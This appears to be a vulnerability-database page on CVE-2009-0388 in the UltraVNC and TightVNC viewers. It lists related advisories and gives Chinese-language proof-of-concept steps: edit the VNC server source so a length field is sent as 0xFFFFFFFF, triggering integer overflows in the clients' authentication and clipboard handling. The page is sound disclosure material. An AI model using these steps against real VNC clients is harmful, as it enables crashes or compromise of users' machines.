| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
| TightVNC Authentication Failure Integer Overflow PoC | 9 Feb 200900:00 | – | zdt | |
| CVE-2009-0388 | 4 Feb 200900:00 | – | circl | |
| VNC Multiple Integer Overflows | 3 Feb 200900:00 | – | coresecurity | |
| Update Protection against UltraVNC VNCViewer Authenticate Buffer Overflow | 27 Feb 200900:00 | – | checkpoint_advisories | |
| UltraVNC VNCViewer Authenticate Buffer Overflow (CVE-2009-0388) | 11 Oct 200900:00 | – | checkpoint_advisories | |
| CVE-2009-0388 | 4 Feb 200919:00 | – | cve | |
| CVE-2009-0388 | 4 Feb 200919:00 | – | cvelist | |
| CVE-2009-0388 | 4 Feb 200919:00 | – | debiancve | |
| TightVNC - Authentication Failure Integer Overflow (PoC) | 9 Feb 200900:00 | – | exploitdb | |
| TightVNC - Authentication Failure Integer Overflow (PoC) | 9 Feb 200900:00 | – | exploitpack |
修改VNC服务器发送如下特制报文:
/-----------
358: BOOL vncClientThread::SendTextStringMessage(const char *str)
359: {
360: CARD32 len = Swap32IfLE(strlen(str));
361: if (!m_socket->SendExact((char *)&len, sizeof(len)))
362: return FALSE;
363: if (!m_socket->SendExact(str, strlen(str)))
364: return FALSE;
365:
366: return TRUE;
367: }
...
- -----------/
修改360行,0xFFFFFFFF长度可在以下函数中触发异常:
. 对于UltraVNC,在ClientConnection::Authenticate()中
. 对于TightVNC,在ClientConnection::ReadFailureReason()中
如果要在ClientConnection.cpp文件的ClientConnection::CheckBufferSize函数中触发漏洞:
/-----------
(vncClient.cpp)
1848: void vncClient::UpdateClipText(LPSTR text)
1849: {
..
..
1858: rfbServerCutTextMsg message;
1860: message.length = Swap32IfLE(strlen(text));
1861: if (!SendRFBMsg(rfbServerCutText, (BYTE *) &message, sizeof(message)))
1862: {
1863: Kill();
1864: return;
1865: }
1866: if (!m_socket->SendQueued(text, strlen(text)))
1867: {
1868: Kill();
1869: return;
1870: }
1871: }
..
- -----------/
在1860行必须将message.length结构修改为0xFFFFFFFF值。
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation